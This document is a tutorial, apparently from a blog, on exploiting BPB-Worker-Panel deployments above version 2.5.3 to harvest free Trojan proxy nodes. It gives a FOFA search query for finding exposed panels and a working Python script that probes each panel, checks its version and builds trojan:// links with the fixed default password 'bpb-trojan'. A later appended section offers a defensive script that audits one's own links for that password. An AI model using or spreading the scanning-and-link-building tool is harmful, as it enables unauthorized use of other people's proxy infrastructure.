Exploiting a vulnerability in BPB-Worker-Panel versions above 2.5.3 to obtain a large number of free Trojan nodes

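1. Preface

These free proxy nodes come mainly from exploiting a vulnerability in the BPB-Worker-Panel panel. The vulnerability was disclosed long ago, but the developer has never taken it seriously and has left it unfixed, so let's all have some fun with it... This is purely for entertainment, and users are advised not to install BPB-Worker-Panel until the vulnerability has been fixed!

Reference: "Bulk-obtaining free VPN nodes, more than you could ever use... exploiting the BPB-Worker-Panel bug!!" (零度博客)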

2. Tutorial

2.1. Requirements

  • A browser
  • Python
    • requests

Install the Python dependencies:

pip install requests packaging

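2.2. Obtain the BPB-Worker-Panel panel URLs

  1. Open https://i.nosec.org/login in a browser and log in to your account

  2. Open https://fofa.info/result?qbase64=aWNvbl9oYXNoPSItMTM1NDAyNzMxOSIgJiYgYXNuPSIxMzMzNSIgJiYgcG9ydD0iNDQzIg%3D%3D and download the results as a CSV file

2.3. Check whether a panel is the specified BPB-Worker-Panel version

Rename the downloaded file to input.txt (or change the file name directly in the code), create a .py file in the same folder, and paste in the following code: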

from packaging import version
import requests

# Location of the input CSV file of domains
input_file = "input.txt"
# Location of the output file for the Trojan results
output_file = "trojan_urls.txt"
# Cloudflare preferred domain
domain = "www.visa.com.sg"


def append_login_to_urls(input_file, output_file):
    """Append /login to each address and save the result to a new file."""
    print(f"正在处理 {input_file},将地址加上 /login 并保存到 {output_file}...")
    with open(input_file, "r", encoding="utf-8") as infile, open(
        output_file, "w", encoding="utf-8"
    ) as outfile:
        for line in infile:
            # Keep only lines that start with http, split at the first comma
            if line.lower().startswith("http"):
                url = line.split(",")[0].strip() + "/login"
                outfile.write(url + "\n")
    print(f"已完成地址追加,结果保存到 {output_file}")


def extract_version(html):
    """Extract the BPB Panel version number from the HTML content."""
    if "BPB Panel" in html:
        start_index = html.find("BPB Panel")
        # Extract the version number (assumes it starts with 2)
        version_start = html.find("2", start_index)
        version_end = version_start
        while version_end < len(html) and (
            html[version_end].isdigit() or html[version_end] == "."
        ):
            version_end += 1
        return html[version_start:version_end]
    return None


def check_bpb_version(input_file, output_file):
    """Request each address and check the BPB Panel version number."""
    print(f"正在验证 {input_file} 中的地址...")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
    }
    min_version = version.parse("2.5.3")  # Minimum version number
    with open(input_file, "r", encoding="utf-8") as infile, open(
        output_file, "w", encoding="utf-8"
    ) as outfile:
        for line in infile:
            url = line.strip()
            try:
                response = requests.get(url, headers=headers, timeout=10)
                if response.status_code == 200 and "BPB Panel" in response.text:
                    # Extract the version number
                    raw_version = extract_version(response.text)
                    if raw_version:
                        parsed_version = version.parse(raw_version)
                        if parsed_version > min_version:
                            print(f"[匹配] {url} (版本号: {parsed_version})")
                            outfile.write(url + "\n")
            except Exception as e:
                print(f"[错误] 无法访问 {url},错误:{e}")
    print(f"验证完成,符合条件的地址保存到 {output_file}")


def composite_trojan(input_file, output_file):
    """Build the Trojan addresses."""
    # Strip https:// and /login
    # Template: trojan://[email protected]:443?security=tls&sni=<domain goes here>&fp=chrome&allowlnsecure=1&type=ws&host=<domain goes here>&path=%2Ftr%3Fed%3D2560#BPB
    with open(input_file, "r", encoding="utf-8") as infile, open(
        output_file, "w", encoding="utf-8"
    ) as outfile:
        for line in infile:
            url = line.strip()
            url = url[8:-6]
            trojan_url = f"trojan://bpb-trojan@{domain}:443?security=tls&sni={url}&fp=chrome&allowlnsecure=1&type=ws&host={url}&path=%2Ftr%3Fed%3D2560#{url}"
            outfile.write(trojan_url + "\n")


if __name__ == "__main__":
    append_login_to_urls(input_file, "bpb_urls.txt")
    check_bpb_version("bpb_urls.txt", "bpb_urls_ok.txt")
    composite_trojan("bpb_urls_ok.txt", output_file)

2.4. Import the Trojan nodes

The trojan_urls.txt file in the same folder contains the processed Trojan nodes.
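
For someone who runs their own panel, the relevant check is whether their share links still carry the fixed password `bpb-trojan` that the script above writes into every link. The following is an added example, not code from the original post or from the BPB-Worker-Panel project; the function names and the sample export with its `example.com` / `example.net` hostnames are constructed, and it assumes the operator has their own links available as newline-separated text.

```python
from urllib.parse import urlsplit, parse_qs, unquote

# Fixed password that the script above writes into every generated link.
SHARED_PASSWORD = "bpb-trojan"

def audit_trojan_link(link):
    """Return a list of findings for one trojan:// share link (empty = none)."""
    parts = urlsplit(link.strip())
    if parts.scheme != "trojan":
        return ["not a trojan:// link"]
    findings = []
    password = unquote(parts.username or "")
    if not password:
        findings.append("missing password")
    elif password == SHARED_PASSWORD:
        findings.append("password is the publicly known fixed value")
    # Query keys are matched case-insensitively; the last value wins.
    query = {k.lower(): v[-1] for k, v in parse_qs(parts.query).items()}
    if query.get("security") != "tls":
        findings.append("TLS not requested")
    if query.get("allowinsecure") in ("1", "true"):
        findings.append("certificate verification disabled")
    return findings

def audit_export(text):
    """Audit a newline-separated export; map each Worker host to its findings."""
    report = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        host = parse_qs(urlsplit(line.strip()).query).get("host", ["?"])[0]
        findings = audit_trojan_link(line)
        if findings:
            report[host] = findings
    return report

# Constructed sample export (hostnames are placeholders, not real deployments).
SAMPLE_EXPORT = """\
trojan://bpb-trojan@edge.example.net:443?security=tls&sni=panel-a.example.com&type=ws&host=panel-a.example.com&path=%2Ftr%3Fed%3D2560#panel-a
trojan://n7Qx2LrV9w@edge.example.net:443?security=tls&sni=panel-b.example.com&allowInsecure=1&type=ws&host=panel-b.example.com&path=%2Ftr%3Fed%3D2560#panel-b
trojan://k3Zp8TmY1c@edge.example.net:443?security=tls&sni=panel-c.example.com&type=ws&host=panel-c.example.com&path=%2Ftr%3Fed%3D2560#panel-c
"""

if __name__ == "__main__":
    for host, findings in audit_export(SAMPLE_EXPORT).items():
        print(host, "->", "; ".join(findings))
```

A host that appears in the report with the fixed-password finding is reachable by anyone who knows that string, so its password should be replaced with a unique value before the link is used again.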